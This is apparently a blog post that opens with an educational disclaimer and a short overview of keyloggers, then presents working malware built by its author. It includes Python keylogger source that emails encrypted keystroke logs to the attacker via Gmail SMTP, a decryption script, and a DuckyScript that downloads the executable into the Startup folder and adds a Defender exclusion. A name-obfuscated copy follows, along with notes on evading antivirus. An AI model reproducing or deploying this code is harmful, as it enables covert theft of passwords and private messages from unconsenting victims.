DISCLAIMER:
THE CONTENT OF THIS POST IS INTENDED FOR EDUCATIONAL PURPOSES ONLY. THE INFORMATION PROVIDED IS DESIGNED TO ENHANCE UNDERSTANDING AND AWARENESS ABOUT KEYLOGGERS AND THEIR IMPLICATIONS IN CYBERSECURITY. IT IS NOT MEANT TO ENCOURAGE UNAUTHORIZED OR ILLEGAL ACTIVITIES. READERS ARE ADVISED TO USE THE KNOWLEDGE GAINED FROM THIS POST RESPONSIBLY AND ETHICALLY, ADHERING TO ALL APPLICABLE LAWS AND REGULATIONS REGARDING PRIVACY AND DATA PROTECTION.
In the digital age, where every keystroke can hold valuable information, keyloggers have become a tool of significant interest and concern. A keylogger, short for “keystroke logger,” is a type of monitoring software designed to record the keys struck on a keyboard. The concept might sound simple, but the implications are vast and complex.
Keyloggers can be software-based or hardware devices, and their uses range from benign to malicious. On the one hand, they are employed by companies to troubleshoot technical problems, by parents to monitor their children’s online activities, or even by individuals to track their own device usage for productivity reasons. On the other hand, keyloggers can be used by cybercriminals to stealthily collect personal and sensitive information such as passwords, credit card numbers, and confidential communications.
The legality of keyloggers is a gray area; it largely depends on the intent and consent. If the device owner installs a keylogger, it’s generally legal. However, when keyloggers are used without the owner’s knowledge or consent, they become a tool for cyber espionage.
Keyloggers don’t typically harm the system they infect; instead, they silently gather information, posing a significant threat to personal privacy and security. The data captured by keyloggers can be extensive, recording everything typed by the user, which could include sensitive financial information and private conversations.
Protecting oneself from keyloggers involves a combination of vigilance and cybersecurity best practices. This includes keeping software up to date, avoiding downloads from untrusted sources, using comprehensive security software, and being cautious on unsecured Wi-Fi networks, where keylogger attacks like DarkHotel can occur.
The evolution of keyloggers has mirrored the advancement of technology, becoming more sophisticated and harder to detect. As we continue to share more of our lives digitally, the threat posed by these digital spies grows. Awareness and education are key in combating this threat, ensuring that our keystrokes remain private and secure in the vast digital landscape.
Here i will go over a keylogger i built. Its not anything fancy, but maby will create an insight or interest to build your own. I have used python to build my keylogger. i will also add a rubber ducky script i made for it. You will probably need to turn off you AV when using this as it gets picked up.
import logging as log
from pynput.keyboard import Key, Listener
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import schedule
import time
import threading
from cryptography.fernet import Fernet
log_dir = "C:\\Users\\Tim\\Documents" # replace with your log directory
log.basicConfig(filename=(log_dir + "key_log.txt"), level=log.DEBUG, format='%(asctime)s: %(message)s')
def p(k): log.info(str(k))
def send_email(log_file):
sender_email = ""
receiver_email = ""
password = ""
# Generate a key
key = Fernet.generate_key()
# Instance the Fernet class with the key
cipher_suite = Fernet(key)
message = MIMEMultipart("alternative")
message["Subject"] = "Keylogger report"
message["From"] = sender_email
message["To"] = receiver_email
# Open the log file and read its contents
with open(log_file, "r") as file:
log_data = file.read()
# Bytes to be encrypted
log_data = log_data.encode()
# Encrypt the bytes
cipher_text = cipher_suite.encrypt(log_data)
# Create the plain-text version of your message
text = f"""\
Hi,
Here is your encrypted keylogger report:
{cipher_text}
And here is your Fernet key:
{key}
"""
# Turn these into plain/html MIMEText objects
part1 = MIMEText(text, "plain")
# Add HTML/plain-text parts to MIMEMultipart message
message.attach(part1)
# Create secure connection with server and send email
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(sender_email, password)
server.sendmail(
sender_email, receiver_email, message.as_string()
)
def job():
send_email(log_dir + "key_log.txt")
# Schedule the job every 60 seconds
schedule.every(60).seconds.do(job)
def start_listener():
with Listener(on_press=p) as listener:
listener.join()
# Start the keylogger in a separate thread
threading.Thread(target=start_listener).start()
while True:
schedule.run_pending()
time.sleep(1)
Under the def email function you have to put the email you use and the password. The password is not your usual login password.
I am using google for this and have only tried it this way for now so will show you how using google.
Sign in to google – Manage your google account – Security
You must enable and set up 2-step verification. This will enable you to use app pass. After setting up 2-step verification you should see the app password option available.
Click on app passwords – Verify yourself – Select App(Mail) – Select Device(EmailProgram) – Generate
Your should now see your app password it will look something like this: uwer pofr koiy kjdf. You will have to save it or write it down, it will not be shown again even in your google account. You can now place this password in the password section under def email function.
I added the encryption because i thought it would enable it to go more undetected from AV. When running as a python file and sometimes an EXE it didn’t flag straight away or for quite a while, but the more i edited and used it AV got use to it.
Here is a decryption program for the incoming email logs.
from cryptography.fernet import Fernet
# The key used for encryption
key = b'3DTxAky6GUyazSQ2Zjm14032hBuGvygVQVo60K4vCAW='
# Instance the Fernet class with the key
cipher_suite = Fernet(key)
# The cipher text
cipher_text = b'gAAAAABl1lk3GHH_lE3O4zw_DKyYpCjlx7yShaghaQK9Hmc'
# Decrypt the cipher text
plain_text = cipher_suite.decrypt(cipher_text)
# Decode bytes to string
plain_text = plain_text.decode()
print(plain_text) # Output: The decrypted text
The key at the top is an example. The cipher text is a lot longer i have cut it down here. This would usually be the main body of the email logs.
REM This is a DuckyScript to download a file using PowerShell
REM Open Windows cmd
WINDOWS r
DELAY 100
STRING powershell Start-Process -Verb RunAs cmd
ENTER
DELAY 5000
STRING cd @%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup@
ENTER
DELAY 100
REM Type the PowerShell command to download the file
STRING powershell Invoke-WebRequest -Uri http://192.168.0.15/vshost.exe -OutFile vshost.exe
ENTER
DELAY 5000
REM Add To Exclusion Folder
STRING powershell Add-MpPreference -ExclusionPath '%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/vshost.exe'
ENTER
REM Start Program
STRING vshost.exe
ENTER
DELAY 100
REM Close CMD
STRING exit
ENTER
Here is the ducky script i can use with the code. I used my apache server to download on to a windows machine. The @s and a few other symbols may look funny this is because of my keyboard layout UK. So i set it so it would run without me having to change symbols all the time. The vshost.exe is just the same code as above keylogger, but i tried using obfuscation technique called name mingling. I also changed it to an EXE. I will put this code below.
import logging as l
from pynput.keyboard import Key, Listener
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import schedule
import time
import threading
from cryptography.fernet import Fernet
# Set the log directory
d = "C:\\Users\\Public\\Documents"
l.basicConfig(filename=(d + "k_l.txt"), level=l.DEBUG, format='%(asctime)s: %(message)s')
def p(k): l.info(str(k))
def s_e(l_f):
s_e = ""
r_e = ""
p = ""
# Generate a key
k = Fernet.generate_key()
# Instance the Fernet class with the key
c_s = Fernet(k)
m = MIMEMultipart("alternative")
m["Subject"] = "Keylogger report"
m["From"] = s_e
m["To"] = r_e
# Open the log file and read its contents
with open(l_f, "r") as f:
l_d = f.read()
# Bytes to be encrypted
l_d = l_d.encode()
# Encrypt the bytes
c_t = c_s.encrypt(l_d)
# Create the plain-text version of your message
t = f"""\
Hi,
Here is your encrypted keylogger report:
{c_t}
And here is your Fernet key:
{k}
"""
# Turn these into plain/html MIMEText objects
p1 = MIMEText(t, "plain")
# Add HTML/plain-text parts to MIMEMultipart message
m.attach(p1)
# Create secure connection with server and send email
c = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=c) as s:
s.login(s_e, p)
s.sendmail(
s_e, r_e, m.as_string()
)
def j():
s_e(d + "k_l.txt")
# Schedule the job every 60 seconds
schedule.every(30).minutes.do(j)
def s_l():
with Listener(on_press=p) as l:
l.join()
# Start the keylogger in a separate thread
threading.Thread(target=s_l).start()
while True:
schedule.run_pending()
time.sleep(1800)
In conclusion, keyloggers represent a dual-edged sword in the digital age. While they can be utilized for legitimate purposes such as parental control or company security, the potential for misuse by cybercriminals remains a significant threat. It is crucial for individuals and organizations to remain vigilant, employing robust security measures and staying informed about the ways to detect and prevent unauthorized keylogging. As technology advances, so too must our defenses against such invasive tools to protect our personal and professional information from falling into the wrong hands.
StealthCyberOps 
Leave a comment